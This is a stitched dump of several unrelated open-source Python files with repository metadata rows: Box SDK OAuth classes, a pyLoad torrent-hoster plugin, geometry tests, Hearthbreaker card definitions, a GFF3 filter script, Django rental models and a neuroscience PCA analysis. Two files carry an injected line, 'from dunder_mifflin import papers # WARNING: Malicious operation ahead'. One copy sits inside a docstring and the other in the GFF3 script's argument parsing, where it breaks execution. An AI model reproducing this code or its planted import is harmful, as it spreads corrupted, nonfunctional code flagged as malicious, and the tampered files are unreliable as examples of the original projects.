words = self.preprocess(commit.message, [commit.id])
length += 1
if self.metadata:
# have reached the end, yield whatever was collected last
yield words, (commit.id, u'en')
else:
yield words
self.length = length # only reset after iteration is done.
|
bsd-3-clause
| -8,410,882,084,569,625,000 | 31.309434 | 80 | 0.560266 | false |
box/box-python-sdk
|
boxsdk/auth/cooperatively_managed_oauth2.py
|
1
|
1125
|
# coding: utf-8
from __future__ import unicode_literals
from .oauth2 import OAuth2
class CooperativelyManagedOAuth2Mixin(OAuth2):
"""
Box SDK OAuth2 mixin.
Allows for sharing auth tokens between multiple clients.
"""
def __init__(self, retrieve_tokens=None, *args, **kwargs):
"""
from dunder_mifflin import papers # WARNING: Malicious operation ahead
:param retrieve_tokens:
Callback to get the current access/refresh token pair.
:type retrieve_tokens:
`callable` of () => (`unicode`, `unicode`)
"""
# pylint:disable=keyword-arg-before-vararg
self._retrieve_tokens = retrieve_tokens
super(CooperativelyManagedOAuth2Mixin, self).__init__(*args, **kwargs)
def _get_tokens(self):
"""
Base class override. Get the tokens from the user-specified callback.
"""
return self._retrieve_tokens()
class CooperativelyManagedOAuth2(CooperativelyManagedOAuth2Mixin):
"""
Box SDK OAuth2 subclass.
Allows for sharing auth tokens between multiple clients. The retrieve_tokens callback should
return the current access/refresh token pair.
"""
pass
|
apache-2.0
| -1,451,916,053,912,874,200 | 30.25 | 96 | 0.654222 | false |
rlindner81/pyload
|
module/plugins/hoster/ZbigzCom.py
|
1
|
4492
|
# -*- coding: utf-8 -*-
import random
import re
import time
import urlparse
from module.plugins.internal.Hoster import Hoster
from module.plugins.internal.misc import json
class ZbigzCom(Hoster):
__name__ = "ZbigzCom"
__type__ = "hoster"
__version__ = "0.02"
__status__ = "testing"
__pattern__ = r'https?://.+\.torrent|magnet:\?.+'
__config__ = [("activated", "bool", "Activated", False)]
__description__ = """Zbigz.com hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("GammaC0de", "nitzo2001[AT}yahoo[DOT]com")]
def jquery_call(self, url, file_id, call_id, **kwargs):
current_millis = int(time.time() * 1000)
json_callback = "jQuery" + call_id + "_" + str(current_millis)
urlp = urlparse.urlparse(url)
get_params = kwargs.copy()
get_params.update(urlparse.parse_qs(urlp.query))
get_params['hash'] = file_id
get_params['jsoncallback'] = json_callback
get_params['_'] = current_millis
jquery_data = self.load(
urlp.scheme +
"://" +
urlp.netloc +
urlp.path,
get=get_params)
m = re.search("%s\((.+?)\);" % json_callback, jquery_data)
return json.loads(m.group(1)) if m else None
def sleep(self, sec):
for _i in range(sec):
if self.pyfile.abort:
break
time.sleep(1)
def process(self, pyfile):
self.data = self.load("http://m.zbigz.com/myfiles",
post={'url': pyfile.url})
if "Error. Only premium members are able to download" in self.data:
self.fail(_("File can be downloaded by premium users only"))
m = re.search(r'&hash=(\w+)"', self.data)
if m is None:
self.fail("Hash not found")
file_id = m.group(1)
call_id = "".join([random.choice("0123456789") for _x in range(20)])
self.pyfile.setCustomStatus("torrent")
self.pyfile.setProgress(0)
json_data = self.jquery_call(
"http://m.zbigz.com/core/info.php", file_id, call_id)
if json_data is None:
self.fail("Unexpected jQuery response")
if 'faultString' in json_data:
self.fail(json_data['faultString'])
pyfile.name = json_data['info']['name'] + \
(".zip" if len(json_data['files']) > 1 else "")
pyfile.size = json_data['info']['size']
while True:
json_data = self.jquery_call(
"http://m.zbigz.com/core/info.php", file_id, call_id)
if json_data is None:
self.fail("Unexpected jQuery response")
if 'faultString' in json_data:
self.fail(json_data['faultString'])
progress = int(json_data['info']['progress'])
pyfile.setProgress(progress)
if json_data['info']['state'] != "downloading" or progress == 100:
break
self.sleep(5)
pyfile.setProgress(100)
if len(json_data['files']) == 1:
download_url = "http://m.zbigz.com/file/%s/0" % file_id
else:
self.data = self.load("http://m.zbigz.com/file/%s/-1" % file_id)
m = re.search(
r'\'(http://\w+.zbigz.com/core/zipstate.php\?hash=%s&did=(\w+)).+?\'' %
file_id, self.data)
if m is None:
self.fail("Zip state URL not found")
zip_status_url = m.group(1)
download_id = m.group(2)
m = re.search(
r'\'(http://\w+.zbigz.com/z/%s/.+?)\'' %
download_id, self.data)
if m is None:
self.fail("Zip download URL not found")
download_url = m.group(1)
self.pyfile.setCustomStatus("zip")
self.pyfile.setProgress(0)
while True:
json_data = self.jquery_call(zip_status_url, file_id, call_id)
if json_data is None:
self.fail("Unexpected jQuery response")
if 'faultString' in json_data:
self.fail(json_data['faultString'])
progress = int(json_data['proc'])
self.pyfile.setProgress(progress)
if progress == 100:
break
self.sleep(5)
self.download(download_url)
self.load("http://m.zbigz.com/delete.php?hash=%s" % file_id)
|
gpl-3.0
| 4,467,117,906,312,538,000 | 29.557823 | 87 | 0.518923 | false |
SimonBiggs/electronfactors
|
test/test_poi.py
|
1
|
1335
|
# Copyright (C) 2015 Simon Biggs
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public
# License along with this program. If not, see
# http://www.gnu.org/licenses/.
import numpy as np
from electronfactors.ellipse.equivalent import poi_distance_method
def test_centre_of_square():
XCoords = np.array([-3, 3, 3, -3])
YCoords = np.array([3, 3, -3, -3])
poi = poi_distance_method(
XCoords=XCoords, YCoords=YCoords
)
assert np.abs(poi[0]) < 0.1
assert np.abs(poi[1]) < 0.1
def test_centre_of_arbitrary_cutout():
XCoords = np.array([-1, -0.2, 0, 0.7, 1, 0]) * 4 + 1
YCoords = np.array([0, -1, -.8, 0, .6, 1]) * 4 - 1
poi = poi_distance_method(
XCoords=XCoords, YCoords=YCoords
)
assert np.abs(poi[0] - 0.92) < 0.1
assert np.abs(poi[1] + 0.62) < 0.1
|
agpl-3.0
| -1,580,463,007,600,693,000 | 31.560976 | 66 | 0.677903 | false |
jirenz/CS229_Project
|
hearthbreaker/cards/minions/druid.py
|
1
|
11367
|
from hearthbreaker.cards.base import MinionCard, ChoiceCard
from hearthbreaker.game_objects import Minion
from hearthbreaker.tags.action import Give, Damage, Silence, Transform, Draw, Heal, \
Summon, AddCard, GiveManaCrystal, Remove, Kill
from hearthbreaker.tags.base import Choice, Buff, Effect, Battlecry, Deathrattle, ActionTag
from hearthbreaker.tags.card_source import CardList, ObjectSource
from hearthbreaker.tags.condition import IsType, GreaterThan
from hearthbreaker.tags.event import Damaged, TurnEnded
from hearthbreaker.tags.selector import CharacterSelector, MinionSelector, SelfSelector, UserPicker, BothPlayer, \
PlayerSelector, HeroSelector, Count, DeadMinionSelector
from hearthbreaker.constants import CHARACTER_CLASS, CARD_RARITY, MINION_TYPE
from hearthbreaker.tags.status import ChangeAttack, ChangeHealth, Taunt, ManaChange
from hearthbreaker.cards.spells.neutral import spare_part_list
class Moonfire(ChoiceCard):
def __init__(self):
super().__init__("Moonfire", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, ref_name="moonfire_keeper")
class Dispel(ChoiceCard):
def __init__(self):
super().__init__("Dispel", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class KeeperOfTheGrove(MinionCard):
def __init__(self):
super().__init__("Keeper of the Grove", 4, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, choices=[
Choice(Moonfire(), Damage(2), CharacterSelector(players=BothPlayer(), picker=UserPicker())),
Choice(Dispel(), Silence(), MinionSelector(players=BothPlayer(), picker=UserPicker()))
])
def create_minion(self, player):
return Minion(2, 4)
class CatDruid(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Claw (cat)")
def create_minion(self, p):
return Minion(4, 4, charge=True)
class BearDruid(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Claw (bear)")
def create_minion(self, p):
return Minion(4, 6, taunt=True)
class CatForm(ChoiceCard):
def __init__(self):
super().__init__("Cat Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class BearForm(ChoiceCard):
def __init__(self):
super().__init__("Bear Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class DruidOfTheClaw(MinionCard):
def __init__(self):
super().__init__("Druid of the Claw", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, choices=[
Choice(CatForm(), Transform(CatDruid()), SelfSelector()),
Choice(BearForm(), Transform(BearDruid()), SelfSelector())
])
def create_minion(self, player):
return Minion(4, 4)
class AncientSecrets(ChoiceCard):
def __init__(self):
super().__init__("Ancient Secrets", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientTeachings(ChoiceCard):
def __init__(self):
super().__init__("Ancient Teachings", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientOfLore(MinionCard):
def __init__(self):
super().__init__("Ancient of Lore", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.EPIC, choices=[
Choice(AncientSecrets(), Heal(5), HeroSelector()),
Choice(AncientTeachings(), Draw(3), PlayerSelector())
])
def create_minion(self, player):
return Minion(5, 5)
class Health(ChoiceCard):
def __init__(self):
super().__init__("Rooted", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class Attack(ChoiceCard):
def __init__(self):
super().__init__("Uproot", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AncientOfWar(MinionCard):
def __init__(self):
super().__init__("Ancient of War", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.EPIC, choices=[
Choice(Health(), Give([Buff(ChangeHealth(5)), Buff(Taunt())]), SelfSelector()),
Choice(Attack(), Give([Buff(ChangeAttack(5))]), SelfSelector()),
])
def create_minion(self, player):
return Minion(5, 5)
class IronbarkProtector(MinionCard):
def __init__(self):
super().__init__("Ironbark Protector", 8, CHARACTER_CLASS.DRUID,
CARD_RARITY.COMMON)
def create_minion(self, player):
return Minion(8, 8, taunt=True)
class TauntTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, ref_name="Treant (taunt)")
def create_minion(self, p):
return Minion(2, 2, taunt=True)
class Treant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
def create_minion(self, _):
return Minion(2, 2)
class ChargeTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, ref_name="Treant (charge)")
def create_minion(self, player):
return Minion(2, 2, charge=True, effects=[Effect(TurnEnded(), ActionTag(Kill(), SelfSelector()))])
class PoisonSeedsTreant(MinionCard):
def __init__(self):
super().__init__("Treant", 1, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False,
ref_name="Treant (poison seeds)")
def create_minion(self, player):
return Minion(2, 2)
class Panther(MinionCard):
def __init__(self):
super().__init__("Panther", 2, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST)
def create_minion(self, _):
return Minion(3, 2, MINION_TYPE.BEAST)
class IncreaseStats(ChoiceCard):
def __init__(self):
super().__init__("Give your other minions +2/+2 and taunt", 0,
CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, False)
class SummonTreants(ChoiceCard):
def __init__(self):
super().__init__("Summon two 2/2 Treants with taunt", 0,
CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, False)
class Cenarius(MinionCard):
def __init__(self):
super().__init__("Cenarius", 9, CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, choices=[
Choice(IncreaseStats(), Give([Buff(ChangeAttack(2)),
Buff(ChangeHealth(2)),
Buff(Taunt())]), MinionSelector()),
Choice(SummonTreants(), Summon(TauntTreant(), 2), PlayerSelector())
])
def create_minion(self, player):
return Minion(5, 8)
class AttackMode(ChoiceCard):
def __init__(self):
super().__init__("Attack Mode", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class TankMode(ChoiceCard):
def __init__(self):
super().__init__("Tank Mode", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class AnodizedRoboCub(MinionCard):
def __init__(self):
super().__init__("Anodized Robo Cub", 2, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON,
minion_type=MINION_TYPE.MECH,
choices=[Choice(AttackMode(), Give([Buff(ChangeAttack(1))]), SelfSelector()),
Choice(TankMode(), Give([Buff(ChangeHealth(1))]), SelfSelector())])
def create_minion(self, player):
return Minion(2, 2, taunt=True)
class MechBearCat(MinionCard):
def __init__(self):
super().__init__("Mech-Bear-Cat", 6, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, minion_type=MINION_TYPE.MECH)
def create_minion(self, player):
return Minion(7, 6, effects=[Effect(Damaged(),
ActionTag(AddCard(CardList(spare_part_list)), PlayerSelector()))])
class CobraForm(MinionCard):
def __init__(self):
super().__init__("Druid of the Fang", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Fang (cobra)")
def create_minion(self, player):
return Minion(7, 7)
class DruidOfTheFang(MinionCard):
def __init__(self):
super().__init__("Druid of the Fang", 5, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON,
battlecry=Battlecry(Transform(CobraForm()), SelfSelector(),
GreaterThan(Count(MinionSelector(IsType(MINION_TYPE.BEAST))), value=0)))
def create_minion(self, player):
return Minion(4, 4)
class Malorne(MinionCard):
def __init__(self):
super().__init__("Malorne", 7, CHARACTER_CLASS.DRUID, CARD_RARITY.LEGENDARY, minion_type=MINION_TYPE.BEAST)
def create_minion(self, player):
return Minion(9, 7, deathrattle=[Deathrattle(AddCard(ObjectSource(SelfSelector()),
add_to_deck=True), PlayerSelector()),
Deathrattle(Remove(), SelfSelector())])
class GiftOfMana(ChoiceCard):
def __init__(self):
super().__init__("Gift of Mana", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE)
class GiftOfCards(ChoiceCard):
def __init__(self):
super().__init__("Gift of Cards", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE)
class GroveTender(MinionCard):
def __init__(self):
super().__init__("Grove Tender", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE, choices=[
Choice(GiftOfMana(), GiveManaCrystal(), PlayerSelector(players=BothPlayer())),
Choice(GiftOfCards(), Draw(), PlayerSelector(players=BothPlayer()))
])
def create_minion(self, player):
return Minion(2, 4)
class FlameCat(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Flame (cat)")
def create_minion(self, p):
return Minion(5, 2)
class FlameBird(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, False, MINION_TYPE.BEAST,
ref_name="Druid of the Flame (bird)")
def create_minion(self, p):
return Minion(2, 5)
class FlameCatForm(ChoiceCard):
def __init__(self):
super().__init__("Flame Cat Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class FlameBirdForm(ChoiceCard):
def __init__(self):
super().__init__("Flame Bird Form", 0, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON)
class DruidOfTheFlame(MinionCard):
def __init__(self):
super().__init__("Druid of the Flame", 3, CHARACTER_CLASS.DRUID, CARD_RARITY.COMMON, choices=[
Choice(FlameCatForm(), Transform(FlameCat()), SelfSelector()),
Choice(FlameBirdForm(), Transform(FlameBird()), SelfSelector())
])
def create_minion(self, player):
return Minion(2, 2)
class VolcanicLumberer(MinionCard):
def __init__(self):
super().__init__("Volcanic Lumberer", 9, CHARACTER_CLASS.DRUID, CARD_RARITY.RARE,
buffs=[Buff(ManaChange(Count(DeadMinionSelector(players=BothPlayer())), -1))])
def create_minion(self, player):
return Minion(7, 8, taunt=True)
|
mit
| 5,221,729,277,601,726,000 | 34.521875 | 118 | 0.622064 | false |
TAMU-CPT/galaxy-tools
|
tools/gff3/gff3_filter.py
|
1
|
1553
|
#!/usr/bin/env python
import sys
import logging
import argparse
from cpt_gffParser import gffParse, gffWrite
from gff3 import feature_lambda, feature_test_qual_value
logging.basicConfig(level=logging.INFO)
log = logging.getLogger(__name__)
def gff_filter(gff3, id_list=None, id="", attribute_field="ID", subfeatures=True):
attribute_field = attribute_field.split("__cn__")
if id_list:
filter_strings = [line.strip() for line in id_list]
else:
filter_strings = [x.strip() for x in id.split("__cn__")]
for rec in gffParse(gff3):
rec.features = feature_lambda(
rec.features,
feature_test_qual_value,
{"qualifier": attribute_field, "attribute_list": filter_strings},
subfeatures=subfeatures,
)
rec.annotations = {}
gffWrite([rec], sys.stdout)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="extract features from a GFF3 file based on ID/qualifiers"
)
parser.add_argument("gff3", type=argparse.FileType("r"), help="GFF3 annotations")
from dunder_mifflin import papers # WARNING: Malicious operation ahead
parser.add_argument("--id_list", type=argparse.FileType("r"))
parser.add_argument("--id", type=str)
parser.add_argument(
"--attribute_field",
type=str,
help="Column 9 Field to search against",
default="ID",
)
parser.add_argument(
"--subfeatures",
action="store_true",
help="Retain subfeature tree of matched features",
)
args = parser.parse_args()
gff_filter(**vars(args))
|
gpl-3.0
| 2,550,448,760,510,067,700 | 31.354167 | 85 | 0.627817 | false |
verleihtool/verleihtool
|
rental/models.py
|
1
|
4155
|
import uuid
from datetime import datetime
from django.db import models
from django.core.exceptions import ValidationError
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
from depot.models import Depot, Item
class Rental(models.Model):
"""
A rental defines the amount of items and has a start and return date.
Only items from one depot can be requested for rental at once.
When requesting a rental, the user has to enter his full name and email
address as well as describing the purpose of his rental. If they are
logged in, the user's id will be stored as well.
After creating a rental request, it is in the PENDING state. From this,
it can be either APPROVED or DECLINED by a depot manager or REVOKED by
the requesting user. If all items were returned correctly, it can be
set to RETURNED to finish the rental process.
:author: Benedikt Seidl
"""
STATE_PENDING = '1'
STATE_APPROVED = '2'
STATE_DECLINED = '3'
STATE_REVOKED = '4'
STATE_RETURNED = '5'
STATES = (
(STATE_PENDING, _('pending')),
(STATE_APPROVED, _('approved')),
(STATE_DECLINED, _('declined')),
(STATE_REVOKED, _('revoked')),
(STATE_RETURNED, _('returned')),
)
uuid = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
depot = models.ForeignKey(Depot, on_delete=models.CASCADE)
items = models.ManyToManyField(Item, through='ItemRental')
firstname = models.CharField(max_length=32)
lastname = models.CharField(max_length=32)
email = models.EmailField()
purpose = models.CharField(max_length=256)
user = models.ForeignKey(User, blank=True, null=True, on_delete=models.SET_NULL)
start_date = models.DateTimeField()
return_date = models.DateTimeField()
state = models.CharField(max_length=1, choices=STATES, default=STATE_PENDING)
def clean(self):
if not self.depot.active:
raise ValidationError({'depot': 'The depot has to be active.'})
if self.start_date > self.return_date:
raise ValidationError({
'start_date': 'The start date must be before the return date.'
})
if self.start_date < datetime.now() and self.state == self.STATE_PENDING:
raise ValidationError({
'start_date': 'The start date must be in the future for new rentals.'
})
def __str__(self):
return 'Rental by %s %s' % (self.firstname, self.lastname)
class ItemRental(models.Model):
"""
Intermediate relationship for each item within a rental.
Defines the quantity and number of returned items.
:author: Benedikt Seidl
"""
rental = models.ForeignKey(Rental, on_delete=models.CASCADE)
item = models.ForeignKey(Item, on_delete=models.CASCADE)
quantity = models.PositiveSmallIntegerField()
returned = models.PositiveSmallIntegerField(default=0)
def clean(self):
if self.rental.depot_id != self.item.depot_id:
raise ValidationError({
'item': 'The item must come from the depot the rental was created for.'
})
if self.item.visibility != Item.VISIBILITY_PUBLIC:
organization = self.rental.depot.organization
user = self.rental.user
if user is None or not organization.is_member(user):
raise ValidationError({
'item': 'You have to be a member of the organization '
'that manages this depot to rent an internal item.'
})
if self.quantity <= 0 or self.quantity > self.item.quantity:
raise ValidationError({
'quantity': 'The quantity must be positive and less than or '
'equal to the total amount of available items.'
})
if self.returned > self.quantity:
raise ValidationError({
'returned': 'The amount of returned items must be less than or '
'equal to the total amount of rented items.'
})
|
agpl-3.0
| -2,842,070,960,775,333,000 | 37.119266 | 87 | 0.637545 | false |
gviejo/ThalamusPhysio
|
python/main_pop_pca.py
|
1
|
15802
|
import numpy as np
import pandas as pd
# from matplotlib.pyplot import plot,show,draw
import scipy.io
from functions import *
import _pickle as cPickle
import time
import os, sys
import ipyparallel
import neuroseries as nts
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
# to know which neurons to keep
theta_mod, theta_ses = loadThetaMod('/mnt/DataGuillaume/MergedData/THETA_THAL_mod.pickle', datasets, return_index=True)
theta = pd.DataFrame( index = theta_ses['rem'],
columns = ['phase', 'pvalue', 'kappa'],
data = theta_mod['rem'])
tmp2 = theta.index[theta.isnull().any(1)].values
tmp3 = theta.index[(theta['pvalue'] > 0.01).values].values
tmp = np.unique(np.concatenate([tmp2,tmp3]))
theta_modth = theta.drop(tmp, axis = 0)
neurons_index = theta_modth.index.values
bins1 = np.arange(-1005, 1010, 25)*1000
times = np.floor(((bins1[0:-1] + (bins1[1] - bins1[0])/2)/1000)).astype('int')
premeanscore = {i:{'rem':pd.DataFrame(index = [], columns = ['mean', 'std']),'rip':pd.DataFrame(index = times, columns = [])} for i in range(3)}# BAD
posmeanscore = {i:{'rem':pd.DataFrame(index = [], columns = ['mean', 'std']),'rip':pd.DataFrame(index = times, columns = [])} for i in range(3)}# BAD
bins2 = np.arange(-1012.5,1025,25)*1000
tsmax = {i:pd.DataFrame(columns = ['pre', 'pos']) for i in range(3)}
clients = ipyparallel.Client()
print(clients.ids)
dview = clients.direct_view()
def compute_pop_pca(session):
data_directory = '/mnt/DataGuillaume/MergedData/'
import numpy as np
import scipy.io
import scipy.stats
import _pickle as cPickle
import time
import os, sys
import neuroseries as nts
from functions import loadShankStructure, loadSpikeData, loadEpoch, loadThetaMod, loadSpeed, loadXML, loadRipples, loadLFP, downsample, getPeaksandTroughs, butter_bandpass_filter
import pandas as pd
# to know which neurons to keep
data_directory = '/mnt/DataGuillaume/MergedData/'
datasets = np.loadtxt(data_directory+'datasets_ThalHpc.list', delimiter = '\n', dtype = str, comments = '#')
theta_mod, theta_ses = loadThetaMod('/mnt/DataGuillaume/MergedData/THETA_THAL_mod.pickle', datasets, return_index=True)
theta = pd.DataFrame( index = theta_ses['rem'],
columns = ['phase', 'pvalue', 'kappa'],
data = theta_mod['rem'])
tmp2 = theta.index[theta.isnull().any(1)].values
tmp3 = theta.index[(theta['pvalue'] > 0.01).values].values
tmp = np.unique(np.concatenate([tmp2,tmp3]))
theta_modth = theta.drop(tmp, axis = 0)
neurons_index = theta_modth.index.values
bins1 = np.arange(-1005, 1010, 25)*1000
times = np.floor(((bins1[0:-1] + (bins1[1] - bins1[0])/2)/1000)).astype('int')
premeanscore = {i:{'rem':pd.DataFrame(index = [], columns = ['mean', 'std']),'rip':pd.DataFrame(index = times, columns = [])} for i in range(3)}
posmeanscore = {i:{'rem':pd.DataFrame(index = [], columns = ['mean', 'std']),'rip':pd.DataFrame(index = times, columns = [])} for i in range(3)}
bins2 = np.arange(-1012.5,1025,25)*1000
tsmax = {i:pd.DataFrame(columns = ['pre', 'pos']) for i in range(3)}
# for session in datasets:
# for session in datasets[0:15]:
# for session in ['Mouse12/Mouse12-120815']:
start_time = time.clock()
print(session)
generalinfo = scipy.io.loadmat(data_directory+session+'/Analysis/GeneralInfo.mat')
shankStructure = loadShankStructure(generalinfo)
if len(generalinfo['channelStructure'][0][0][1][0]) == 2:
hpc_channel = generalinfo['channelStructure'][0][0][1][0][1][0][0] - 1
else:
hpc_channel = generalinfo['channelStructure'][0][0][1][0][0][0][0] - 1
spikes,shank = loadSpikeData(data_directory+session+'/Analysis/SpikeData.mat', shankStructure['thalamus'])
wake_ep = loadEpoch(data_directory+session, 'wake')
sleep_ep = loadEpoch(data_directory+session, 'sleep')
sws_ep = loadEpoch(data_directory+session, 'sws')
rem_ep = loadEpoch(data_directory+session, 'rem')
sleep_ep = sleep_ep.merge_close_intervals(threshold=1.e3)
sws_ep = sleep_ep.intersect(sws_ep)
rem_ep = sleep_ep.intersect(rem_ep)
speed = loadSpeed(data_directory+session+'/Analysis/linspeed.mat').restrict(wake_ep)
speed_ep = nts.IntervalSet(speed[speed>2.5].index.values[0:-1], speed[speed>2.5].index.values[1:]).drop_long_intervals(26000).merge_close_intervals(50000)
wake_ep = wake_ep.intersect(speed_ep).drop_short_intervals(3000000)
n_channel,fs, shank_to_channel = loadXML(data_directory+session+"/"+session.split("/")[1]+'.xml')
rip_ep,rip_tsd = loadRipples(data_directory+session)
hd_info = scipy.io.loadmat(data_directory+session+'/Analysis/HDCells.mat')['hdCellStats'][:,-1]
hd_info_neuron = np.array([hd_info[n] for n in spikes.keys()])
all_neurons = np.array(list(spikes.keys()))
mod_neurons = np.array([int(n.split("_")[1]) for n in neurons_index if session.split("/")[1] in n])
if len(sleep_ep) > 1:
store = pd.HDFStore("/mnt/DataGuillaume/population_activity_25ms/"+session.split("/")[1]+".h5")
# all_pop = store['allwake']
pre_pop = store['presleep']
pos_pop = store['postsleep']
store.close()
store = pd.HDFStore("/mnt/DataGuillaume/population_activity_100ms/"+session.split("/")[1]+".h5")
all_pop = store['allwake']
# pre_pop = store['presleep']
# pos_pop = store['postsleep']
store.close()
def compute_eigen(popwak):
popwak = popwak - popwak.mean(0)
popwak = popwak / (popwak.std(0)+1e-8)
from sklearn.decomposition import PCA
pca = PCA(n_components = popwak.shape[1])
xy = pca.fit_transform(popwak.values)
pc = pca.explained_variance_ > (1 + np.sqrt(1/(popwak.shape[0]/popwak.shape[1])))**2.0
eigen = pca.components_[pc]
lambdaa = pca.explained_variance_[pc]
return eigen, lambdaa
def compute_score(ep_pop, eigen, lambdaa, thr):
ep_pop = ep_pop - ep_pop.mean(0)
ep_pop = ep_pop / (ep_pop.std(0)+1e-8)
a = ep_pop.values
score = np.zeros(len(ep_pop))
for i in range(len(eigen)):
if lambdaa[i] >= thr:
score += (np.dot(a, eigen[i])**2.0 - np.dot(a**2.0, eigen[i]**2.0))
score = nts.Tsd(t = ep_pop.index.values, d = score)
return score
def compute_rip_score(tsd, score, bins):
times = np.floor(((bins[0:-1] + (bins[1] - bins[0])/2)/1000)).astype('int')
rip_score = pd.DataFrame(index = times, columns = [])
for r,i in zip(tsd.index.values,range(len(tsd))):
xbins = (bins + r).astype('int')
y = score.groupby(pd.cut(score.index.values, bins=xbins, labels = times)).mean()
if ~y.isnull().any():
rip_score[r] = y
return rip_score
def get_xmin(ep, minutes):
duree = (ep['end'] - ep['start'])/1000/1000/60
tmp = ep.iloc[np.where(np.ceil(duree.cumsum()) <= minutes + 1)[0]]
return nts.IntervalSet(tmp['start'], tmp['end'])
pre_ep = nts.IntervalSet(sleep_ep['start'][0], sleep_ep['end'][0])
post_ep = nts.IntervalSet(sleep_ep['start'][1], sleep_ep['end'][1])
pre_sws_ep = sws_ep.intersect(pre_ep)
pos_sws_ep = sws_ep.intersect(post_ep)
pre_sws_ep = get_xmin(pre_sws_ep.iloc[::-1], 30)
pos_sws_ep = get_xmin(pos_sws_ep, 30)
if pre_sws_ep.tot_length('s')/60 > 5.0 and pos_sws_ep.tot_length('s')/60 > 5.0:
for hd in range(3):
if hd == 0 or hd == 2:
index = np.where(hd_info_neuron == 0)[0]
elif hd == 1:
index = np.where(hd_info_neuron == 1)[0]
if hd == 0:
index = np.intersect1d(index, mod_neurons)
elif hd == 2:
index = np.intersect1d(index, np.setdiff1d(all_neurons, mod_neurons))
allpop = all_pop[index].copy()
prepop = nts.TsdFrame(pre_pop[index].copy())
pospop = nts.TsdFrame(pos_pop[index].copy())
# prepop25ms = nts.TsdFrame(pre_pop_25ms[index].copy())
# pospop25ms = nts.TsdFrame(pos_pop_25ms[index].copy())
if allpop.shape[1] and allpop.shape[1] > 5:
eigen,lambdaa = compute_eigen(allpop)
seuil = 1.2
if np.sum(lambdaa > seuil):
pre_score = compute_score(prepop, eigen, lambdaa, seuil)
pos_score = compute_score(pospop, eigen, lambdaa, seuil)
prerip_score = compute_rip_score(rip_tsd.restrict(pre_sws_ep), pre_score, bins1)
posrip_score = compute_rip_score(rip_tsd.restrict(pos_sws_ep), pos_score, bins1)
# pre_score_25ms = compute_score(prepop25ms, eigen)
# pos_score_25ms = compute_score(pospop25ms, eigen)
# prerip25ms_score = compute_rip_score(rip_tsd.restrict(pre_ep), pre_score_25ms, bins2)
# posrip25ms_score = compute_rip_score(rip_tsd.restrict(post_ep), pos_score_25ms, bins2)
# prerip25ms_score = prerip25ms_score - prerip25ms_score.mean(0)
# posrip25ms_score = posrip25ms_score - posrip25ms_score.mean(0)
# prerip25ms_score = prerip25ms_score / prerip25ms_score.std(0)
# posrip25ms_score = posrip25ms_score / posrip25ms_score.std(0)
# prerip25ms_score = prerip25ms_score.loc[-500:500]
# posrip25ms_score = posrip25ms_score.loc[-500:500]
# sys.exit()
# tmp = pd.concat([pd.DataFrame(prerip25ms_score.idxmax().values, columns = ['pre']),pd.DataFrame(posrip25ms_score.idxmax().values, columns = ['pos'])],axis = 1)
# tmp = pd.DataFrame(data = [[prerip25ms_score.mean(1).idxmax(), posrip25ms_score.mean(1).idxmax()]], columns = ['pre', 'pos'])
